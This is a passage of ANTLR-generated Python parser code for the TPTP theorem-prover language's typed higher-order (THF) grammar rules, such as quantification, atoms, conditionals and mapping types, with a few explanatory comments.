self.enterOuterAlt(localctx, 1)
self.state = 584
self.thf_quantification()
self.state = 585
self.thf_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_quantificationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_quantifierContext,0)
def thf_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_variable_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_quantification
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_quantification" ):
listener.enterThf_quantification(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_quantification" ):
listener.exitThf_quantification(self)
def thf_quantification(self):
localctx = tptp_v7_0_0_0Parser.Thf_quantificationContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_thf_quantification)
try:
self.enterOuterAlt(localctx, 1)
self.state = 587
self.thf_quantifier()
self.state = 588
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 589
self.thf_variable_list()
self.state = 590
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 591
self.match(tptp_v7_0_0_0Parser.T__13)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
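# thf_variable_list parses one thf_variable followed by zero or more
# (T__1 thf_variable) pairs, i.e. a separator-delimited list.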
class Thf_variable_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_variable(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_variableContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_variableContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_variable_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_variable_list" ):
listener.enterThf_variable_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_variable_list" ):
listener.exitThf_variable_list(self)
def thf_variable_list(self):
localctx = tptp_v7_0_0_0Parser.Thf_variable_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_thf_variable_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 593
self.thf_variable()
self.state = 598
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 594
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 595
self.thf_variable()
self.state = 600
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_typed_variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_typed_variableContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_variable" ):
listener.enterThf_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_variable" ):
listener.exitThf_variable(self)
def thf_variable(self):
localctx = tptp_v7_0_0_0Parser.Thf_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 50, self.RULE_thf_variable)
try:
self.state = 603
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,20,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 601
self.thf_typed_variable()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 602
self.variable()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_typed_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def thf_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_top_level_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_typed_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_typed_variable" ):
listener.enterThf_typed_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_typed_variable" ):
listener.exitThf_typed_variable(self)
def thf_typed_variable(self):
localctx = tptp_v7_0_0_0Parser.Thf_typed_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_thf_typed_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 605
self.variable()
self.state = 606
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 607
self.thf_top_level_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_unary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unary_connectiveContext,0)
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unary_formula" ):
listener.enterThf_unary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unary_formula" ):
listener.exitThf_unary_formula(self)
def thf_unary_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_unary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 54, self.RULE_thf_unary_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 609
self.thf_unary_connective()
self.state = 610
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 611
self.thf_logic_formula()
self.state = 612
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
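# thf_atom dispatches on the lookahead token: word-like tokens go to thf_function,
# Upper_word to variable, numeric and distinct-object literals to defined_term, and
# connective tokens to thf_conn_term.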
class Thf_atomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_function(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_functionContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_termContext,0)
def thf_conn_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_conn_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_atom" ):
listener.enterThf_atom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_atom" ):
listener.exitThf_atom(self)
def thf_atom(self):
localctx = tptp_v7_0_0_0Parser.Thf_atomContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_thf_atom)
try:
self.state = 618
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 614
self.thf_function()
pass
elif token in [tptp_v7_0_0_0Parser.Upper_word]:
self.enterOuterAlt(localctx, 2)
self.state = 615
self.variable()
pass
elif token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 3)
self.state = 616
self.defined_term()
pass
elif token in [tptp_v7_0_0_0Parser.Or, tptp_v7_0_0_0Parser.And, tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.Infix_inequality, tptp_v7_0_0_0Parser.Infix_equality, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb, tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 4)
self.state = 617
self.thf_conn_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_functionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AtomContext,0)
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def thf_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_argumentsContext,0)
def defined_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_functorContext,0)
def system_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_function
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_function" ):
listener.enterThf_function(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_function" ):
listener.exitThf_function(self)
def thf_function(self):
localctx = tptp_v7_0_0_0Parser.Thf_functionContext(self, self._ctx, self.state)
self.enterRule(localctx, 58, self.RULE_thf_function)
try:
self.state = 636
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,22,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 620
self.atom()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 621
self.functor()
self.state = 622
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 623
self.thf_arguments()
self.state = 624
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 626
self.defined_functor()
self.state = 627
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 628
self.thf_arguments()
self.state = 629
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 631
self.system_functor()
self.state = 632
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 633
self.thf_arguments()
self.state = 634
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_conn_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_pair_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_pair_connectiveContext,0)
def assoc_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Assoc_connectiveContext,0)
def thf_unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_conn_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_conn_term" ):
listener.enterThf_conn_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_conn_term" ):
listener.exitThf_conn_term(self)
def thf_conn_term(self):
localctx = tptp_v7_0_0_0Parser.Thf_conn_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 60, self.RULE_thf_conn_term)
try:
self.state = 641
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand, tptp_v7_0_0_0Parser.Infix_inequality, tptp_v7_0_0_0Parser.Infix_equality, tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 1)
self.state = 638
self.thf_pair_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Or, tptp_v7_0_0_0Parser.And]:
self.enterOuterAlt(localctx, 2)
self.state = 639
self.assoc_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb]:
self.enterOuterAlt(localctx, 3)
self.state = 640
self.thf_unary_connective()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_conditionalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_conditional
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_conditional" ):
listener.enterThf_conditional(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_conditional" ):
listener.exitThf_conditional(self)
def thf_conditional(self):
localctx = tptp_v7_0_0_0Parser.Thf_conditionalContext(self, self._ctx, self.state)
self.enterRule(localctx, 62, self.RULE_thf_conditional)
try:
self.enterOuterAlt(localctx, 1)
self.state = 643
self.match(tptp_v7_0_0_0Parser.T__14)
self.state = 644
self.thf_logic_formula()
self.state = 645
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 646
self.thf_logic_formula()
self.state = 647
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 648
self.thf_logic_formula()
self.state = 649
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_letContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def thf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_let
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_let" ):
listener.enterThf_let(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_let" ):
listener.exitThf_let(self)
def thf_let(self):
localctx = tptp_v7_0_0_0Parser.Thf_letContext(self, self._ctx, self.state)
self.enterRule(localctx, 64, self.RULE_thf_let)
try:
self.enterOuterAlt(localctx, 1)
self.state = 651
self.match(tptp_v7_0_0_0Parser.T__15)
self.state = 652
self.thf_unitary_formula()
self.state = 653
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 654
self.thf_formula()
self.state = 655
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_argumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_formula_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formula_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_arguments" ):
listener.enterThf_arguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_arguments" ):
listener.exitThf_arguments(self)
def thf_arguments(self):
localctx = tptp_v7_0_0_0Parser.Thf_argumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 66, self.RULE_thf_arguments)
try:
self.enterOuterAlt(localctx, 1)
self.state = 657
self.thf_formula_list()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_type_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_typeable_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_typeable_formulaContext,0)
def thf_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_top_level_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_type_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_type_formula" ):
listener.enterThf_type_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_type_formula" ):
listener.exitThf_type_formula(self)
def thf_type_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_type_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 68, self.RULE_thf_type_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 659
self.thf_typeable_formula()
self.state = 660
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 661
self.thf_top_level_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_typeable_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_atomContext,0)
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_typeable_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_typeable_formula" ):
listener.enterThf_typeable_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_typeable_formula" ):
listener.exitThf_typeable_formula(self)
def thf_typeable_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_typeable_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 70, self.RULE_thf_typeable_formula)
try:
self.state = 668
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Or, tptp_v7_0_0_0Parser.And, tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.Infix_inequality, tptp_v7_0_0_0Parser.Infix_equality, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb, tptp_v7_0_0_0Parser.Assignment, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 663
self.thf_atom()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 664
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 665
self.thf_logic_formula()
self.state = 666
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_subtypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_atom(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_atomContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_atomContext,i)
def Subtype_sign(self):
return self.getToken(tptp_v7_0_0_0Parser.Subtype_sign, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_subtype
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_subtype" ):
listener.enterThf_subtype(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_subtype" ):
listener.exitThf_subtype(self)
def thf_subtype(self):
localctx = tptp_v7_0_0_0Parser.Thf_subtypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_thf_subtype)
try:
self.enterOuterAlt(localctx, 1)
self.state = 670
self.thf_atom()
self.state = 671
self.match(tptp_v7_0_0_0Parser.Subtype_sign)
self.state = 672
self.thf_atom()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_top_level_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,0)
def thf_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_mapping_typeContext,0)
def thf_apply_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_top_level_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_top_level_type" ):
listener.enterThf_top_level_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_top_level_type" ):
listener.exitThf_top_level_type(self)
def thf_top_level_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_top_level_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 74, self.RULE_thf_top_level_type)
try:
self.state = 677
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,25,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 674
self.thf_unitary_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 675
self.thf_mapping_type()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 676
self.thf_apply_type()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_unitary_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unitary_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unitary_type" ):
listener.enterThf_unitary_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unitary_type" ):
listener.exitThf_unitary_type(self)
def thf_unitary_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_unitary_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 76, self.RULE_thf_unitary_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 679
self.thf_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_apply_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_apply_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_apply_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_apply_type" ):
listener.enterThf_apply_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_apply_type" ):
listener.exitThf_apply_type(self)
def thf_apply_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_apply_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 78, self.RULE_thf_apply_type)
try:
self.enterOuterAlt(localctx, 1)
self.state = 681
self.thf_apply_formula(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_mapping_typeContext,0)
def thf_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_xprod_typeContext,0)
def thf_union_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_union_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_type" ):
listener.enterThf_binary_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_type" ):
listener.exitThf_binary_type(self)
def thf_binary_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 80, self.RULE_thf_binary_type)
try:
self.state = 686
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,26,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 683
self.thf_mapping_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 684
self.thf_xprod_type(0)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 685
self.thf_union_type(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
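# thf_mapping_type has two alternatives, "unitary Arrow unitary" and
# "unitary Arrow thf_mapping_type"; recursing on the right-hand side makes the
# mapping arrow right-associative.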
class Thf_mapping_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,i)
def Arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Arrow, 0)
def thf_mapping_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_mapping_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_mapping_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_mapping_type" ):
listener.enterThf_mapping_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_mapping_type" ):
listener.exitThf_mapping_type(self)
def thf_mapping_type(self):
localctx = tptp_v7_0_0_0Parser.Thf_mapping_typeContext(self, self._ctx, self.state)
self.enterRule(localctx, 82, self.RULE_thf_mapping_type)
try:
self.state = 696
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,27,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 688
self.thf_unitary_type()
self.state = 689
self.match(tptp_v7_0_0_0Parser.Arrow)
self.state = 690
self.thf_unitary_type()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 692
self.thf_unitary_type()
self.state = 693
self.match(tptp_v7_0_0_0Parser.Arrow)
self.state = 694
self.thf_mapping_type()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_xprod_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
